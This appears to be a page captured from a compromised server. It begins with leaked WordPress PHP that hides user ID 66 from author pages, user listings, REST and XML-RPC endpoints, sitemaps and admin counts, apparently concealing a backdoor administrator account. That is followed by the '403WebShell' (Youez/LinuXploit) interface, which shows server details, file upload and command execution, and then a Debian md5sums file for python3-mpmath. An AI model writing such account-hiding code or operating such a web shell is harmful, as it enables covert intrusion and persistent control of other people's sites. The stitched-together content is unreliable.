add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/lib/dpkg/info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/lib/dpkg/info/python3-mpmath.md5sums
b70acec3d338c2568849a76134d9243a  usr/lib/python3/dist-packages/mpmath-0.0.0.egg-info/PKG-INFO
68b329da9893e34099c7d8ad5cb9c940  usr/lib/python3/dist-packages/mpmath-0.0.0.egg-info/dependency_links.txt
4177054eb0a63f954fd3f89974dbb8a2  usr/lib/python3/dist-packages/mpmath-0.0.0.egg-info/requires.txt
6f543ff8394ecf237397d73f5664dec7  usr/lib/python3/dist-packages/mpmath-0.0.0.egg-info/top_level.txt
d9f5779a2a9c866f84d61edece5f395d  usr/lib/python3/dist-packages/mpmath/__init__.py
26faf7c0c647cec7be7fa9f1ca9409c5  usr/lib/python3/dist-packages/mpmath/calculus/__init__.py
177db6a061062d9e669589502c030612  usr/lib/python3/dist-packages/mpmath/calculus/approximation.py
010fc297eecb708305f5f9b90eedb160  usr/lib/python3/dist-packages/mpmath/calculus/calculus.py
3b36da1ef25839e47c4864c1bef8dacf  usr/lib/python3/dist-packages/mpmath/calculus/differentiation.py
6737dc9658d605e59f4af12d996f4e5b  usr/lib/python3/dist-packages/mpmath/calculus/extrapolation.py
f7bcefa0a4d5d7b01615ecbd377bc624  usr/lib/python3/dist-packages/mpmath/calculus/inverselaplace.py
05717309a41f0aa540623384f3ce3433  usr/lib/python3/dist-packages/mpmath/calculus/odes.py
f53c70045ede90eabe51786918f74f25  usr/lib/python3/dist-packages/mpmath/calculus/optimization.py
953ae410025bf2780b3ef9327b73508a  usr/lib/python3/dist-packages/mpmath/calculus/polynomials.py
26e1a7691d0022820f8c361a185f0152  usr/lib/python3/dist-packages/mpmath/calculus/quadrature.py
969d23dcf1b24a255a4918d893c213b0  usr/lib/python3/dist-packages/mpmath/ctx_base.py
fa9536e7259fa96bacf364db908b4128  usr/lib/python3/dist-packages/mpmath/ctx_fp.py
80cd038b220d1d8ab20ed778f6e485d9  usr/lib/python3/dist-packages/mpmath/ctx_iv.py
9710d553b0f4c2df480603af45d03f63  usr/lib/python3/dist-packages/mpmath/ctx_mp.py
a335f5208720b3270eeaf030fab95434  usr/lib/python3/dist-packages/mpmath/ctx_mp_python.py
f75fe171d57b265d664b4a86919696fd  usr/lib/python3/dist-packages/mpmath/function_docs.py
96ce1a33da71ebcd2d38844bc7d9dc69  usr/lib/python3/dist-packages/mpmath/functions/__init__.py
79542c6dab1674bc523098cfd5c998ac  usr/lib/python3/dist-packages/mpmath/functions/bessel.py
9fb2bb7d340f7962d44be18feaf2bc41  usr/lib/python3/dist-packages/mpmath/functions/elliptic.py
d7ed4b05cf171d9e767df3a14df7da25  usr/lib/python3/dist-packages/mpmath/functions/expintegrals.py
d50707b0aac2d5f5f7b88518d4adee93  usr/lib/python3/dist-packages/mpmath/functions/factorials.py
2574738952946c3142ecd7fd8620e9ee  usr/lib/python3/dist-packages/mpmath/functions/functions.py
f70358efe88deb37813a4539815fab66  usr/lib/python3/dist-packages/mpmath/functions/hypergeometric.py
7c7fa9f050edb450e25778108c9d992b  usr/lib/python3/dist-packages/mpmath/functions/orthogonal.py
e1930357b16cccaed64e5c03be71676a  usr/lib/python3/dist-packages/mpmath/functions/qfunctions.py
190e54eebeaefc0935d955152c65feb7  usr/lib/python3/dist-packages/mpmath/functions/rszeta.py
4c6b8389cb25f0f5127ef84ca73f067e  usr/lib/python3/dist-packages/mpmath/functions/theta.py
0e296c0de7c0ae5d789095b0b5d5a46b  usr/lib/python3/dist-packages/mpmath/functions/zeta.py
ebc6b2228cd067a880fdc7abd532d7d7  usr/lib/python3/dist-packages/mpmath/functions/zetazeros.py
de832e4d85f5665238325e124e913cee  usr/lib/python3/dist-packages/mpmath/identification.py
8cb2966a5481cebb5ed039125f7007cb  usr/lib/python3/dist-packages/mpmath/libmp/__init__.py
0bd76a9306a679a1481bdc5ea78a2929  usr/lib/python3/dist-packages/mpmath/libmp/backend.py
ac952777bd6a1ed447733839de5b44aa  usr/lib/python3/dist-packages/mpmath/libmp/gammazeta.py
cbba727a7eb2d9d38f5e992c578d98d3  usr/lib/python3/dist-packages/mpmath/libmp/libelefun.py
3f4807810316876235141cc0f69d412f  usr/lib/python3/dist-packages/mpmath/libmp/libhyper.py
6382fd3f56bef5821e566031a299244f  usr/lib/python3/dist-packages/mpmath/libmp/libintmath.py
52c91c7e39ac50c5178e7c1351f837c3  usr/lib/python3/dist-packages/mpmath/libmp/libmpc.py
2d015e1f820adf32dd494ddff1c15cdf  usr/lib/python3/dist-packages/mpmath/libmp/libmpf.py
492e03c1c6e410f101e00b3eef294524  usr/lib/python3/dist-packages/mpmath/libmp/libmpi.py
e4a7c4ebae264cad9303cacf2c8a5820  usr/lib/python3/dist-packages/mpmath/math2.py
2a85a76d104965c38866573ed9eef28d  usr/lib/python3/dist-packages/mpmath/matrices/__init__.py
28311337f97e7c3dfce852fde94ab238  usr/lib/python3/dist-packages/mpmath/matrices/calculus.py
0e1e0b310ec98ed9e6e22628b4892823  usr/lib/python3/dist-packages/mpmath/matrices/eigen.py
62ccd228febd8140e8982ccec3c0f4bf  usr/lib/python3/dist-packages/mpmath/matrices/eigen_symmetric.py
84c8865c5b4cb26b869f7784ed67c43a  usr/lib/python3/dist-packages/mpmath/matrices/linalg.py
5d5fb4c7336d85a55488e176eed34b51  usr/lib/python3/dist-packages/mpmath/matrices/matrices.py
5b8a8b082008cf407a53fc3d68dd09a1  usr/lib/python3/dist-packages/mpmath/rational.py
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/mpmath/tests/__init__.py
8e3bc2f9a9041c4a61805cbf8f219a1c  usr/lib/python3/dist-packages/mpmath/tests/extratest_gamma.py
9808dcda135a3c9fa80876a1e64a6049  usr/lib/python3/dist-packages/mpmath/tests/extratest_zeta.py
51a11940ec8c6fd3af78b348123e46ec  usr/lib/python3/dist-packages/mpmath/tests/runtests.py
5651cce7d479cc19155275778211397d  usr/lib/python3/dist-packages/mpmath/tests/test_basic_ops.py
5ebda01015a40d7898fb4b6c9f7cfd7d  usr/lib/python3/dist-packages/mpmath/tests/test_bitwise.py
0ce649049863a9e3cecb6e8fa231424d  usr/lib/python3/dist-packages/mpmath/tests/test_calculus.py
05ddbe9f9bbe2a792fa64723a81aae93  usr/lib/python3/dist-packages/mpmath/tests/test_compatibility.py
8c5177a3f0116b360c2c74c7141d5bf1  usr/lib/python3/dist-packages/mpmath/tests/test_convert.py
35f1350b7f3355ebde8461a2a67c2b24  usr/lib/python3/dist-packages/mpmath/tests/test_diff.py
9637db1667173763772af077314e3b49  usr/lib/python3/dist-packages/mpmath/tests/test_division.py
715da2828ff29939cdbdd997ae59a882  usr/lib/python3/dist-packages/mpmath/tests/test_eigen.py
007fb338cfb4a0625b01e89024d5b3d8  usr/lib/python3/dist-packages/mpmath/tests/test_eigen_symmetric.py
eefa902949e49893a44516fe472b3ae9  usr/lib/python3/dist-packages/mpmath/tests/test_elliptic.py
93a1392663f399f58879304d4994da19  usr/lib/python3/dist-packages/mpmath/tests/test_fp.py
165f9d3c0154524ddc8f350ff0b601f6  usr/lib/python3/dist-packages/mpmath/tests/test_functions.py
e09be066b4d7a042fd3837d3295b0848  usr/lib/python3/dist-packages/mpmath/tests/test_functions2.py
39c9e0879d3f30c5167709c9fc40faaa  usr/lib/python3/dist-packages/mpmath/tests/test_gammazeta.py
27e519d0980eb490709be9880ae7250c  usr/lib/python3/dist-packages/mpmath/tests/test_hp.py
d5c87726ed1a7f5f482588e4be4bd5df  usr/lib/python3/dist-packages/mpmath/tests/test_identify.py
ba9e6707b56b0ec9ddef8f97a3abd13b  usr/lib/python3/dist-packages/mpmath/tests/test_interval.py
839c4e9d7c03331dd38f6e26e7fcbc7c  usr/lib/python3/dist-packages/mpmath/tests/test_levin.py
caf719d682338bec924dcba59f96d7a3  usr/lib/python3/dist-packages/mpmath/tests/test_linalg.py
d3111aeafc356c71b722c1d0c253ca03  usr/lib/python3/dist-packages/mpmath/tests/test_matrices.py
00bf234981caade8a90c8183d5a6286a  usr/lib/python3/dist-packages/mpmath/tests/test_mpmath.py
1db61d2632a77ed8839983c85cd5c750  usr/lib/python3/dist-packages/mpmath/tests/test_ode.py
e8b1904401b79f63678f0674a07eb2f9  usr/lib/python3/dist-packages/mpmath/tests/test_pickle.py
441351d5b248afd58b89f9bc26b0544f  usr/lib/python3/dist-packages/mpmath/tests/test_power.py
339cde7834deae7e8bdec856004da5d9  usr/lib/python3/dist-packages/mpmath/tests/test_quad.py
e2cee533a9394ffe000bb454658ade71  usr/lib/python3/dist-packages/mpmath/tests/test_rootfinding.py
1e61a83262d5f93e534115a05e9707a6  usr/lib/python3/dist-packages/mpmath/tests/test_special.py
e7cbab70ab5985ceb65f752c4f33d25a  usr/lib/python3/dist-packages/mpmath/tests/test_str.py
0a2ba47cb71919e1260e9b5cd6392e83  usr/lib/python3/dist-packages/mpmath/tests/test_summation.py
71135cf7c85b69e939d0cd7d11e2ae41  usr/lib/python3/dist-packages/mpmath/tests/test_trig.py
d315cd6a664e5d735f8d9ae8b5deac68  usr/lib/python3/dist-packages/mpmath/tests/test_visualization.py
a88ab1a1b9aaba747823cad9c628ac3d  usr/lib/python3/dist-packages/mpmath/tests/torture.py
b3e4de60f4b55b927256ef62b7eedde8  usr/lib/python3/dist-packages/mpmath/usertools.py
082645b4e451e42b626c6605565f198e  usr/lib/python3/dist-packages/mpmath/visualization.py
7795124b2eca81c864fd2c113b52cc81  usr/share/doc/python3-mpmath/changelog.Debian.gz
5f6e652b3451fa6b5b782e3e72e409e5  usr/share/doc/python3-mpmath/copyright

Youez - 2016 - github.com/yon3zu
LinuXploit